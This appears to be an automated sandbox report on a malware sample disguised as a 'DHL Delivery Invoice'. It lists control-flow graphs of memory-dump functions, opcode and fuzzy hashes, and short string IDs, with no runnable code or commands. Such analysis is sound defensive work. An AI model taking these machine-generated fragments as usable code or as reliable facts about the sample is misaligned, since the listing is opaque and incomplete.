                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1324 6537dd8-6537df6 1325 6537df8-6537dfb 1324->1325 1326 6537dfd-6537e17 1325->1326 1327 6537e1c-6537e1f 1325->1327 1326->1327 1328 6537e21-6537e2b 1327->1328 1329 6537e2c-6537e2f 1327->1329 1331 6537e31-6537e3f 1329->1331 1332 6537e46-6537e49 1329->1332 1339 6537e41 1331->1339 1340 6537e7e-6537e94 1331->1340 1333 6537e4b-6537e67 1332->1333 1334 6537e6c-6537e6e 1332->1334 1333->1334 1336 6537e70 1334->1336 1337 6537e75-6537e78 1334->1337 1336->1337 1337->1325 1337->1340 1339->1332 1344 6537e9a-6537ea3 1340->1344 1345 65380af-65380b9 1340->1345 1346 65380ba-65380c4 1344->1346 1347 6537ea9-6537ec6 1344->1347 1350 65380c6-65380cc 1346->1350 1351 6538115-653811b 1346->1351 1358 653809c-65380a9 1347->1358 1359 6537ecc-6537ef4 1347->1359 1355 65380ce-65380db 1350->1355 1356 65380dc 1350->1356 1352 653811f-6538121 1351->1352 1353 653811d 1351->1353 1357 653812b-6538132 1352->1357 1353->1357 1355->1356 1360 6538096 1356->1360 1361 65380de-65380ef 1356->1361 1363 6538143 1357->1363 1364 6538134-6538141 1357->1364 1358->1344 1358->1345 1359->1358 1362 6537efa-6537f03 1359->1362 1360->1358 1360->1362 1365 65380f1-65380f4 1361->1365 1362->1346 1368 6537f09-6537f25 1362->1368 1366 6538148-653814a 1363->1366 1364->1366 1369 65381a7-65381aa 1365->1369 1370 65380fa-6538106 1365->1370 1373 6538161-653819a 1366->1373 1374 653814c-653814f 1366->1374 1383 6537f2b-6537f55 1368->1383 1384 653808a-6538093 1368->1384 1371 65381b0-65381bf 1369->1371 1372 65383d6-65383d9 1369->1372 1380 6538111-6538113 1370->1380 1387 65381c1-65381dc 1371->1387 1388 65381de-6538219 1371->1388 1377 65383db-65383f7 1372->1377 1378 65383fc-65383fe 1372->1378 1373->1371 1406 653819c-65381a6 1373->1406 1375 653840e-6538417 1374->1375 1377->1378 1385 6538400 1378->1385 1386 6538405-6538408 1378->1386 1380->1351 1380->1357 1407 6538080-6538085 1383->1407 1408 6537f5b-6537f83 1383->1408 1384->1360 1385->1386 1386->1365 1386->1375 1387->1388 1396 65383aa-65383c0 1388->1396 1397 653821f-6538230 1388->1397 1396->1372 1404 6538236-6538253 1397->1404 1405 6538395-65383a4 1397->1405 1404->1405 1416 6538259-653834f call 65365f8 1404->1416 1405->1396 1405->1397 1407->1384 1408->1407 1417 6537f89-6537fb7 1408->1417 1462 6538351-653835b 1416->1462 1463 653835d 1416->1463 1417->1407 1422 6537fbd-6537fc6 1417->1422 1422->1407 1424 6537fcc-6537ffe 1422->1424 1431 6538000-6538004 1424->1431 1432 6538009-6538025 1424->1432 1431->1407 1434 6538006 1431->1434 1432->1384 1435 6538027-653807e call 65365f8 1432->1435 1434->1432 1435->1384 1464 6538362-6538364 1462->1464 1463->1464 1464->1405 1465 6538366-653836b 1464->1465 1466 6538379 1465->1466 1467 653836d-6538377 1465->1467 1468 653837e-6538380 1466->1468 1467->1468 1468->1405 1469 6538382-653838e 1468->1469 1469->1405
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                  • Opcode ID: 695033b0381f0f305409ef1ca5d7a00f2281415f8b011e6d54144df9e76c3930
                                                                                                                                  • Instruction ID: 4af507b4f103aee29f3ac9e5b5b8527f0c956fc299cbe1b45eb552166d24f990
                                                                                                                                  • Opcode Fuzzy Hash: 695033b0381f0f305409ef1ca5d7a00f2281415f8b011e6d54144df9e76c3930
                                                                                                                                  • Instruction Fuzzy Hash: BF02AF30B002258FDB58DF65DA54AAEB7F2FF84700F148569E5159B3A9DB35EC82CB80
                                                                                                                                  Function 06532408 Relevance: 1.0, Instructions: 1005COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3d07296bd45cf806177e8c542f8211582f346f68f56b052e5742e4cf31b0c3e4
                                                                                                                                  • Instruction ID: 9325890e37c202ec6cb4954aaddbedd013c3529b4c9a8468064d78017d1ef053
                                                                                                                                  • Opcode Fuzzy Hash: 3d07296bd45cf806177e8c542f8211582f346f68f56b052e5742e4cf31b0c3e4
                                                                                                                                  • Instruction Fuzzy Hash: F0925530A006248FDB64DF68C584A6DB7F2FF44714F5488A9E44AAB365DB35EE85CF80
                                                                                                                                  Function 06536648 Relevance: .8, Instructions: 826COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 24ecff2c88f7199b73b1d5bf02ff8d9fd8ae6f8fb9b3df96e63f591f837c2b24
                                                                                                                                  • Instruction ID: 46a76e779407a14cd8dee4ee1c9f31d2da6dd5215f0fea58bbf471cd85bb6823
                                                                                                                                  • Opcode Fuzzy Hash: 24ecff2c88f7199b73b1d5bf02ff8d9fd8ae6f8fb9b3df96e63f591f837c2b24
                                                                                                                                  • Instruction Fuzzy Hash: F1629B34A002299FDB54DB68D594AADB7F2FB88750F248469E806EB394DB35ED41CF80
                                                                                                                                  Function 0653C1E8 Relevance: .6, Instructions: 645COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 047349fb9b8a89ad507f93d84394bfc20b001cdad49f19b8de3d47451382d35c
                                                                                                                                  • Instruction ID: fc220624aba6afc39edcd7620c91692cdce79bbf3756954e6f6f50de33d53ff9
                                                                                                                                  • Opcode Fuzzy Hash: 047349fb9b8a89ad507f93d84394bfc20b001cdad49f19b8de3d47451382d35c
                                                                                                                                  • Instruction Fuzzy Hash: A8328F34B102198FDF94DB68D990BAEB7B2FB88710F108569E506EB359DB35EC41CB90
                                                                                                                                  Function 06535628 Relevance: .6, Instructions: 595COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8e970b9bdf1c6ba5535a80522a4316c29f34e30144a5989cca88a09c701b04dd
                                                                                                                                  • Instruction ID: 6f32f9afae6008bb2b90fc98666185b1853ea028544789eb70159e1250042c38
                                                                                                                                  • Opcode Fuzzy Hash: 8e970b9bdf1c6ba5535a80522a4316c29f34e30144a5989cca88a09c701b04dd
                                                                                                                                  • Instruction Fuzzy Hash: C512D175E002298FDF64DB64D9806AEB7B6FB84710F249429E906DB385EB34ED41CB90
                                                                                                                                  Function 0653B282 Relevance: .6, Instructions: 568COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 398d3398aac9d049896c98b487ae453b9bc6136408305db9a07870bede927db6
                                                                                                                                  • Instruction ID: af624707254926503062dbbf94354643e487f9a833eb9f7e4c040b9e941ffa5b
                                                                                                                                  • Opcode Fuzzy Hash: 398d3398aac9d049896c98b487ae453b9bc6136408305db9a07870bede927db6
                                                                                                                                  • Instruction Fuzzy Hash: 4D228030E102298FDFA4DB68C5807AEB7B6FB99710F248526E405EB395DA35DC81CF91
                                                                                                                                  Function 0653AD28 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 653ad28-653ad46 1 653ad48-653ad4b 0->1 2 653ad5f-653ad62 1->2 3 653ad4d-653ad5a 1->3 4 653ad64-653ad69 2->4 5 653ad6c-653ad6f 2->5 3->2 4->5 9 653af45-653af4e 5->9 10 653ad75-653ad78 5->10 11 653add0-653add9 9->11 12 653af54-653af5e 9->12 13 653ad9b-653ad9e 10->13 14 653ad7a-653ad96 10->14 17 653af5f-653af96 11->17 18 653addf-653ade3 11->18 15 653ada0-653ada9 13->15 16 653adae-653adb1 13->16 14->13 15->16 19 653adb3-653adc6 16->19 20 653adcb-653adce 16->20 36 653af98-653af9b 17->36 21 653ade8-653adeb 18->21 19->20 20->11 20->21 24 653aded-653adf1 21->24 25 653adfc-653adfe 21->25 24->12 28 653adf7 24->28 29 653ae00 25->29 30 653ae05-653ae08 25->30 28->25 29->30 30->1 33 653ae0e-653ae32 30->33 42 653af42 33->42 43 653ae38-653ae47 33->43 37 653afa1-653afdc 36->37 38 653b204-653b207 36->38 48 653afe2-653afee 37->48 49 653b1cf-653b1e2 37->49 40 653b214-653b217 38->40 41 653b209-653b213 38->41 44 653b219-653b21d 40->44 45 653b228-653b22b 40->45 42->9 58 653ae49-653ae4f 43->58 59 653ae5f-653ae9a call 65365f8 43->59 44->37 47 653b223 44->47 50 653b23a-653b23d 45->50 51 653b22d call 653b282 45->51 47->45 67 653aff0-653b009 48->67 68 653b00e-653b052 48->68 54 653b1e4-653b1e5 49->54 52 653b260-653b262 50->52 53 653b23f-653b25b 50->53 61 653b233-653b235 51->61 56 653b264 52->56 57 653b269-653b26c 52->57 53->52 54->38 56->57 57->36 64 653b272-653b27c 57->64 65 653ae53-653ae55 58->65 66 653ae51 58->66 80 653aeb2-653aec9 59->80 81 653ae9c-653aea2 59->81 61->50 65->59 66->59 67->54 83 653b054-653b066 68->83 84 653b06e-653b0ad 68->84 95 653aee1-653aef2 80->95 96 653aecb-653aed1 80->96 85 653aea6-653aea8 81->85 86 653aea4 81->86 83->84 90 653b0b3-653b18e call 65365f8 84->90 91 653b194-653b1a9 84->91 85->80 86->80 90->91 91->49 102 653aef4-653aefa 95->102 103 653af0a-653af3b 95->103 98 653aed3 96->98 99 653aed5-653aed7 96->99 98->95 99->95 105 653aefe-653af00 102->105 106 653aefc 102->106 103->42 105->103 106->103
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1078448309
                                                                                                                                  • Opcode ID: 38b70714bac3a314243543412249808f5bb65c355fe59b06b6a9c324581cc768
                                                                                                                                  • Instruction ID: ae6d77c70641ca4cc63b3cfa864a9acf74bcb812002013550c0ea26095d96479
                                                                                                                                  • Opcode Fuzzy Hash: 38b70714bac3a314243543412249808f5bb65c355fe59b06b6a9c324581cc768
                                                                                                                                  • Instruction Fuzzy Hash: BAE17030E102198FCF65DBA9D5806AEB7F2FF85700F208929E419AB355DB75D846CB90
                                                                                                                                  Function 0653B6A0 Relevance: 8.0, Strings: 6, Instructions: 471COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 258 653b6a0-653b6c2 259 653b6c4-653b6c7 258->259 260 653b6d7-653b6da 259->260 261 653b6c9-653b6d2 259->261 262 653b701-653b704 260->262 263 653b6dc-653b6e0 260->263 261->260 266 653b711-653b714 262->266 267 653b706-653b70c 262->267 264 653b6e6-653b6f6 263->264 265 653ba4b-653ba86 263->265 272 653b9c1-653b9c2 264->272 275 653b6fc 264->275 276 653ba88-653ba8b 265->276 268 653b716-653b719 266->268 269 653b71e-653b721 266->269 267->266 268->269 269->272 273 653b727-653b72a 269->273 274 653b9c7-653b9ca 272->274 277 653b734-653b737 273->277 278 653b72c-653b731 273->278 279 653ba2e-653ba30 274->279 280 653b9cc-653ba29 call 65365f8 274->280 275->262 281 653baae-653bab1 276->281 282 653ba8d-653baa9 276->282 283 653b739-653b73d 277->283 284 653b74e-653b751 277->284 278->277 290 653ba32 279->290 291 653ba37-653ba3a 279->291 280->279 286 653bab7-653badf 281->286 287 653bd1d-653bd1f 281->287 282->281 283->265 285 653b743-653b749 283->285 288 653b753-653b75a 284->288 289 653b765-653b768 284->289 285->284 339 653bae1-653bae4 286->339 340 653bae9-653bb2d 286->340 292 653bd21 287->292 293 653bd26-653bd29 287->293 294 653b873-653b87c 288->294 295 653b760 288->295 296 653b76a-653b76e 289->296 297 653b77f-653b782 289->297 290->291 291->259 298 653ba40-653ba4a 291->298 292->293 293->276 301 653bd2f-653bd38 293->301 304 653b881-653b884 294->304 295->289 296->265 303 653b774-653b77a 296->303 305 653b7c0-653b7c3 297->305 306 653b784-653b799 297->306 303->297 309 653b886-653b88a 304->309 310 653b89b-653b89e 304->310 312 653b7d3-653b7d6 305->312 313 653b7c5-653b7ce 305->313 306->265 324 653b79f-653b7bb 306->324 309->265 317 653b890-653b896 309->317 319 653b8a0-653b8a3 310->319 320 653b8aa-653b8ad 310->320 314 653b7d8-653b7dc 312->314 315 653b7fd-653b800 312->315 313->312 314->265 321 653b7e2-653b7f2 314->321 322 653b802-653b80b 315->322 323 653b810-653b813 315->323 317->310 326 653b8a5 319->326 327 653b844-653b847 319->327 328 653b8b4-653b8b7 320->328 329 653b8af-653b8b1 320->329 321->263 348 653b7f8 321->348 322->323 323->272 334 653b819-653b81c 323->334 324->305 326->320 327->265 330 653b84d-653b854 327->330 331 653b8ca-653b8cd 328->331 332 653b8b9-653b8c5 328->332 329->328 335 653b859-653b85c 330->335 337 653b8f4-653b8f7 331->337 338 653b8cf-653b8d3 331->338 332->331 341 653b83f-653b842 334->341 342 653b81e-653b83a 334->342 345 653b86e-653b871 335->345 346 653b85e 335->346 350 653b901-653b904 337->350 351 653b8f9-653b8fc 337->351 338->265 349 653b8d9-653b8e9 338->349 339->301 376 653bb33-653bb3c 340->376 377 653bd12-653bd1c 340->377 341->327 341->335 342->341 345->294 345->304 356 653b866-653b869 346->356 348->315 349->314 363 653b8ef 349->363 350->272 354 653b90a-653b90d 350->354 351->350 358 653b923-653b926 354->358 359 653b90f-653b918 354->359 356->345 361 653b965-653b968 358->361 362 653b928-653b93d 358->362 366 653b9a1-653b9aa 359->366 367 653b91e 359->367 361->319 369 653b96e-653b971 361->369 362->265 378 653b943-653b960 362->378 363->337 366->265 368 653b9b0-653b9b7 366->368 367->358 371 653b9bc-653b9bf 368->371 374 653b993-653b996 369->374 375 653b973-653b98e 369->375 371->272 371->274 374->359 379 653b99c-653b99f 374->379 375->374 380 653bb42-653bbae call 65365f8 376->380 381 653bd08-653bd0d 376->381 378->361 379->366 379->371 392 653bbb4-653bbb9 380->392 393 653bca8-653bcbd 380->393 381->377 395 653bbd5 392->395 396 653bbbb-653bbc1 392->396 393->381 397 653bbd7-653bbdd 395->397 398 653bbc3-653bbc5 396->398 399 653bbc7-653bbc9 396->399 401 653bbf2-653bbff 397->401 402 653bbdf-653bbe5 397->402 400 653bbd3 398->400 399->400 400->397 409 653bc01-653bc07 401->409 410 653bc17-653bc24 401->410 403 653bc93-653bca2 402->403 404 653bbeb 402->404 403->392 403->393 404->401 405 653bc26-653bc33 404->405 406 653bc5a-653bc67 404->406 416 653bc35-653bc3b 405->416 417 653bc4b-653bc58 405->417 418 653bc69-653bc6f 406->418 419 653bc7f-653bc8c 406->419 412 653bc0b-653bc0d 409->412 413 653bc09 409->413 410->403 412->410 413->410 420 653bc3f-653bc41 416->420 421 653bc3d 416->421 417->403 422 653bc73-653bc75 418->422 423 653bc71 418->423 419->403 420->417 421->417 422->419 423->419
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: 65dec04a4bb59256ada003f2ba437eebaf140de1c24f489c4f26c96895afb8ce
                                                                                                                                  • Instruction ID: 74c45b9b824eb6145e373161f0a1c85b72980d1b7029964ab548c52cb9eeebc1
                                                                                                                                  • Opcode Fuzzy Hash: 65dec04a4bb59256ada003f2ba437eebaf140de1c24f489c4f26c96895afb8ce
                                                                                                                                  • Instruction Fuzzy Hash: 12028B30E1022A8FDFA4CF68D5806ADB7B2FB95710F24896AE405DB355DB34ED81CB91
                                                                                                                                  Function 065391A0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 426 65391a0-65391c5 427 65391c7-65391ca 426->427 428 65391f0-65391f3 427->428 429 65391cc-65391eb 427->429 430 6539ab3-6539ab5 428->430 431 65391f9-653920e 428->431 429->428 432 6539ab7 430->432 433 6539abc-6539abf 430->433 438 6539210-6539216 431->438 439 6539226-653923c 431->439 432->433 433->427 436 6539ac5-6539acf 433->436 440 653921a-653921c 438->440 441 6539218 438->441 443 6539247-6539249 439->443 440->439 441->439 444 6539261-65392d2 443->444 445 653924b-6539251 443->445 456 65392d4-65392f7 444->456 457 65392fe-653931a 444->457 446 6539253 445->446 447 6539255-6539257 445->447 446->444 447->444 456->457 462 6539346-6539361 457->462 463 653931c-653933f 457->463 468 6539363-6539385 462->468 469 653938c-65393a7 462->469 463->462 468->469 474 65393d2-65393dc 469->474 475 65393a9-65393cb 469->475 476 65393de-65393e7 474->476 477 65393ec-6539466 474->477 475->474 476->436 483 65394b3-65394c8 477->483 484 6539468-6539486 477->484 483->430 488 65394a2-65394b1 484->488 489 6539488-6539497 484->489 488->483 488->484 489->488
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                  • Opcode ID: 78447271d2886241a389b22b554d01c2a1cbbaeacd1d22f72e4409da32f8d649
                                                                                                                                  • Instruction ID: 0a65a15af23b4e4366ed322453ab3bb512569c2fefad5edc7ae70cfb0d52775b
                                                                                                                                  • Opcode Fuzzy Hash: 78447271d2886241a389b22b554d01c2a1cbbaeacd1d22f72e4409da32f8d649
                                                                                                                                  • Instruction Fuzzy Hash: 1F917E70F0061A8FDB64DF65DA507AEB3B6BF84640F108469D809AB398EB75EC518F90
                                                                                                                                  Function 0653CFA8 Relevance: 4.6, Strings: 3, Instructions: 800COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 492 653cfa8-653cfc3 493 653cfc5-653cfc8 492->493 494 653d011-653d014 493->494 495 653cfca-653d00c 493->495 496 653d031-653d034 494->496 497 653d016-653d02c 494->497 495->494 498 653d036-653d078 496->498 499 653d07d-653d080 496->499 497->496 498->499 502 653d082-653d084 499->502 503 653d08f-653d092 499->503 504 653d08a 502->504 505 653d48d 502->505 506 653d094-653d0a3 503->506 507 653d0db-653d0de 503->507 504->503 511 653d490-653d49c 505->511 512 653d0b2-653d0be 506->512 513 653d0a5-653d0aa 506->513 514 653d0e0-653d0e5 507->514 515 653d0e8-653d0eb 507->515 516 653d4a2-653d78f 511->516 517 653d18e-653d19d 511->517 518 653d9c1-653d9f6 512->518 519 653d0c4-653d0d6 512->519 513->512 514->515 522 653d134-653d137 515->522 523 653d0ed-653d12f 515->523 704 653d9b6-653d9c0 516->704 705 653d795-653d79b 516->705 524 653d19f-653d1a4 517->524 525 653d1ac-653d1b8 517->525 537 653d9f8-653d9fb 518->537 519->507 526 653d180-653d183 522->526 527 653d139-653d17b 522->527 523->522 524->525 525->518 533 653d1be-653d1d0 525->533 526->511 529 653d189-653d18c 526->529 527->526 529->517 536 653d1d5-653d1d8 529->536 533->536 539 653d221-653d224 536->539 540 653d1da-653d21c 536->540 543 653da0a-653da0d 537->543 544 653d9fd call 653db15 537->544 550 653d226-653d268 539->550 551 653d26d-653d270 539->551 540->539 548 653da40-653da43 543->548 549 653da0f-653da3b 543->549 561 653da03-653da05 544->561 554 653da66-653da68 548->554 555 653da45-653da61 548->555 549->548 550->551 558 653d272-653d2b4 551->558 559 653d2b9-653d2bc 551->559 565 653da6a 554->565 566 653da6f-653da72 554->566 555->554 558->559 563 653d305-653d308 559->563 564 653d2be-653d300 559->564 561->543 568 653d313-653d316 563->568 569 653d30a-653d30c 563->569 564->563 565->566 566->537 573 653da74-653da83 566->573 579 653d339-653d33b 568->579 580 653d318-653d334 568->580 577 653d34b-653d354 569->577 578 653d30e 569->578 594 653da85-653dae8 call 65365f8 573->594 595 653daea-653daff 573->595 590 653d363-653d36f 577->590 591 653d356-653d35b 577->591 578->568 588 653d342-653d345 579->588 589 653d33d 579->589 580->579 588->493 588->577 589->588 599 653d480-653d485 590->599 600 653d375-653d389 590->600 591->590 594->595 599->505 600->505 612 653d38f-653d3a1 600->612 622 653d3a3-653d3a9 612->622 623 653d3c5-653d3c7 612->623 626 653d3ab 622->626 627 653d3ad-653d3b9 622->627 629 653d3d1-653d3dd 623->629 630 653d3bb-653d3c3 626->630 627->630 636 653d3eb 629->636 637 653d3df-653d3e9 629->637 630->629 639 653d3f0-653d3f2 636->639 637->639 639->505 641 653d3f8-653d414 call 65365f8 639->641 651 653d423-653d42f 641->651 652 653d416-653d41b 641->652 651->599 653 653d431-653d47e 651->653 652->651 653->505 706 653d7aa-653d7b3 705->706 707 653d79d-653d7a2 705->707 706->518 708 653d7b9-653d7cc 706->708 707->706 710 653d7d2-653d7d8 708->710 711 653d9a6-653d9b0 708->711 712 653d7e7-653d7f0 710->712 713 653d7da-653d7df 710->713 711->704 711->705 712->518 714 653d7f6-653d817 712->714 713->712 717 653d826-653d82f 714->717 718 653d819-653d81e 714->718 717->518 719 653d835-653d852 717->719 718->717 719->711 722 653d858-653d85e 719->722 722->518 723 653d864-653d87d 722->723 725 653d883-653d8aa 723->725 726 653d999-653d9a0 723->726 725->518 729 653d8b0-653d8ba 725->729 726->711 726->722 729->518 730 653d8c0-653d8d7 729->730 732 653d8e6-653d901 730->732 733 653d8d9-653d8e4 730->733 732->726 738 653d907-653d920 call 65365f8 732->738 733->732 742 653d922-653d927 738->742 743 653d92f-653d938 738->743 742->743 743->518 744 653d93e-653d992 743->744 744->726
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2086306503
                                                                                                                                  • Opcode ID: fa1d6d848967aad97a44b6cbcfb3014ddfe1843825a786f9fab9227945c424e0
                                                                                                                                  • Instruction ID: 96f15e9ee8f3a9b307e4ef40cc82c6a0e6141eabda3248b1500348e1b49508c2
                                                                                                                                  • Opcode Fuzzy Hash: fa1d6d848967aad97a44b6cbcfb3014ddfe1843825a786f9fab9227945c424e0
                                                                                                                                  • Instruction Fuzzy Hash: 85625330A102198FCB55EF68D690A5EB7B2FF85700F20CA69D4059F369DB75ED86CB80
                                                                                                                                  Function 06534BF0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 752 6534bf0-6534c14 753 6534c16-6534c19 752->753 754 65352f8-65352fb 753->754 755 6534c1f-6534d17 753->755 756 65352fd-6535317 754->756 757 653531c-653531e 754->757 775 6534d9a-6534da1 755->775 776 6534d1d-6534d6a call 6535499 755->776 756->757 759 6535320 757->759 760 6535325-6535328 757->760 759->760 760->753 762 653532e-653533b 760->762 777 6534da7-6534e17 775->777 778 6534e25-6534e2e 775->778 789 6534d70-6534d8c 776->789 795 6534e22 777->795 796 6534e19 777->796 778->762 792 6534d97 789->792 793 6534d8e 789->793 792->775 793->792 795->778 796->795
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fpq$XPpq$\Opq
                                                                                                                                  • API String ID: 0-2571271785
                                                                                                                                  • Opcode ID: 60085f105f18484adbde6360de72be969c12daa1b5e9ec2040c9693f49d1705c
                                                                                                                                  • Instruction ID: 4be2cf7c64418e5395f59f84fb5f029bc62d99d3425c88a3b334fc4a1d54e742
                                                                                                                                  • Opcode Fuzzy Hash: 60085f105f18484adbde6360de72be969c12daa1b5e9ec2040c9693f49d1705c
                                                                                                                                  • Instruction Fuzzy Hash: EC617071F002199FEB549BA4C914BAEBBF6FB88700F208429E506AB395DF758C458B91
                                                                                                                                  Function 06539193 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1799 6539193-65391c5 1800 65391c7-65391ca 1799->1800 1801 65391f0-65391f3 1800->1801 1802 65391cc-65391eb 1800->1802 1803 6539ab3-6539ab5 1801->1803 1804 65391f9-653920e 1801->1804 1802->1801 1805 6539ab7 1803->1805 1806 6539abc-6539abf 1803->1806 1811 6539210-6539216 1804->1811 1812 6539226-653923c 1804->1812 1805->1806 1806->1800 1809 6539ac5-6539acf 1806->1809 1813 653921a-653921c 1811->1813 1814 6539218 1811->1814 1816 6539247-6539249 1812->1816 1813->1812 1814->1812 1817 6539261-65392d2 1816->1817 1818 653924b-6539251 1816->1818 1829 65392d4-65392f7 1817->1829 1830 65392fe-653931a 1817->1830 1819 6539253 1818->1819 1820 6539255-6539257 1818->1820 1819->1817 1820->1817 1829->1830 1835 6539346-6539361 1830->1835 1836 653931c-653933f 1830->1836 1841 6539363-6539385 1835->1841 1842 653938c-65393a7 1835->1842 1836->1835 1841->1842 1847 65393d2-65393dc 1842->1847 1848 65393a9-65393cb 1842->1848 1849 65393de-65393e7 1847->1849 1850 65393ec-6539466 1847->1850 1848->1847 1849->1809 1856 65394b3-65394c8 1850->1856 1857 6539468-6539486 1850->1857 1856->1803 1861 65394a2-65394b1 1857->1861 1862 6539488-6539497 1857->1862 1861->1856 1861->1857 1862->1861
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
